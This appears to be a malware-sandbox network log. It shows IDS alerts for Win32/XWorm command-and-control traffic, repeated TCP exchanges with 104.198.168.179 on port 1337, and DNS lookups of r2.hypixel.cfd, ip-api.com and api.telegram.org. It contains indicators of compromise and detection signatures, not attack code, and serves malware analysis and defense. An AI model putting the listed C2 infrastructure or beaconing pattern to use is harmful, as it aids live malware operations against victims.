2024-11-23T21:05:35.069157+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:38.640134+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:38.716530+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:38.949523+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:39.017669+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:39.250891+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:39.265257+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:39.497896+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:39.502159+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:39.978714+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:39.986161+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:44.551660+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:44.555068+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:49.594079+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:49.604419+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:50.497744+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:50.499487+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:50.698991+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:50.700760+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:51.591338+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:51.593221+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:55.751418+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:55.860453+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:00.701370+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:00.704112+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:00.902763+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:00.904480+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:01.878874+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:01.903762+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:02.489633+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:02.491826+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:05.390110+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:05.390110+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:15.391981+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:15.396263+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:16.150188+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:16.228275+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:16.362651+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:16.457196+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:16.550015+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:16.624665+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:29.187457+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:29.190148+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:34.374193+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:34.570564+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:35.084989+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:35.084989+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:42.797190+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:42.806358+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:44.827208+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:44.832141+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:46.503446+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:46.631866+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:51.522127+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:51.526216+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:52.270009+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:52.273835+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:00.928713+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:07:00.932230+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                                                                                                                2024-11-23T21:07:02.376681+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:07:02.382413+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:07:03.202099+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:07:03.206395+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:07:05.084425+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:07:05.084425+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:07:08.592033+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:07:08.595658+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
                                                                                                                2024-11-23T21:07:11.747248+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.749711TCP
                                                                                                                2024-11-23T21:07:11.749735+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749711104.198.168.1791337TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Nov 23, 2024 21:04:23.967437983 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:23.980400085 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:24.114331007 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:31.381282091 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:31.501306057 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:31.734513044 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:31.739407063 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:31.865834951 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:32.300214052 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:32.420063019 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:32.653666019 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:32.655875921 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:32.775552034 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:35.036902905 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:35.096287966 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:36.628212929 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:36.747875929 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:36.981287003 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:36.985966921 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:37.105704069 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:48.424942017 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:48.544610977 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:48.544696093 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:48.667835951 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:48.781948090 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:48.784656048 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:48.905328035 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:48.925122976 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:48.980222940 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:49.047409058 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:49.054011106 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:49.173536062 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:49.282929897 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:49.285345078 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:49.407413960 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:51.520520926 CET4970280192.168.2.7208.95.112.1
                                                                                                                Nov 23, 2024 21:04:51.640168905 CET8049702208.95.112.1192.168.2.7
                                                                                                                Nov 23, 2024 21:04:52.551139116 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:52.671627045 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:52.904777050 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:52.906435966 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:53.033098936 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.035406113 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.155137062 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.155195951 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.281681061 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.281735897 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.388194084 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.488960981 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.489032030 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.589382887 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.608568907 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.608634949 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.690402985 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.728346109 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.728415012 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.801517010 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.848613024 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.848808050 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.972477913 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.003519058 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.129995108 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.130043983 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.256396055 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.256453037 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.363403082 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.439035892 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.439091921 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.559204102 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.564582109 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.566683054 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.640703917 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.689974070 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.730009079 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.730220079 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.760385036 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.849776030 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.849831104 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.971438885 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:03.486964941 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:03.606628895 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:03.840384007 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:03.842107058 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:03.962582111 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:05.053093910 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:05.098045111 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:06.752731085 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:06.872385979 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:06.872452974 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:06.993375063 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.107572079 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.111881018 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:07.231482029 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.308686972 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.310410976 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:07.458925009 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:09.161082983 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:09.280936956 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:09.514456987 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:09.516554117 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:09.639548063 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.128155947 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.247791052 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.247845888 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.369294882 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.471437931 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.481178045 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.594890118 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.594933033 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.682710886 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.720156908 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.720220089 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.939235926 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.939275026 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.941566944 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:13.061101913 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:14.596746922 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:14.716644049 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:14.950022936 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:14.951463938 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:15.071201086 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:26.534181118 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:26.653887987 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:26.887002945 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:26.894889116 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:27.021285057 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:31.287399054 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:31.407622099 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:31.641024113 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:31.653759003 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:31.776518106 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:35.069156885 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:35.300190926 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.284069061 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.406929970 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.596668005 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.640134096 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.690026999 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.716481924 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.716530085 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.836344957 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.893944979 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.949522972 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.017621040 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.017668962 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.137232065 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.145176888 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.250890970 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.264964104 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.265256882 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.387027025 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.497895956 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.502159119 CET497111337192.168.2.7104.198.168.179
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 21:03:03.273665905 CET | 51352 | 53 | 192.168.2.7 | 1.1.1.1
Nov 23, 2024 21:03:03.600261927 CET | 53 | 51352 | 1.1.1.1 | 192.168.2.7
Nov 23, 2024 21:03:09.960879087 CET | 61667 | 53 | 192.168.2.7 | 1.1.1.1
Nov 23, 2024 21:03:10.053013086 CET | 58292 | 53 | 192.168.2.7 | 1.1.1.1
Nov 23, 2024 21:03:10.191384077 CET | 53 | 58292 | 1.1.1.1 | 192.168.2.7
Nov 23, 2024 21:03:13.324184895 CET | 57697 | 53 | 192.168.2.7 | 1.1.1.1
Nov 23, 2024 21:03:13.469187975 CET | 53 | 57697 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 23, 2024 21:03:03.273665905 CET | 192.168.2.7 | 1.1.1.1 | 0x1aa5 | Standard query (0) | r2.hypixel.cfd | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:09.960879087 CET | 192.168.2.7 | 1.1.1.1 | 0x69df | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:10.053013086 CET | 192.168.2.7 | 1.1.1.1 | 0x63d8 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 23, 2024 21:03:13.324184895 CET | 192.168.2.7 | 1.1.1.1 | 0x6bfa | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
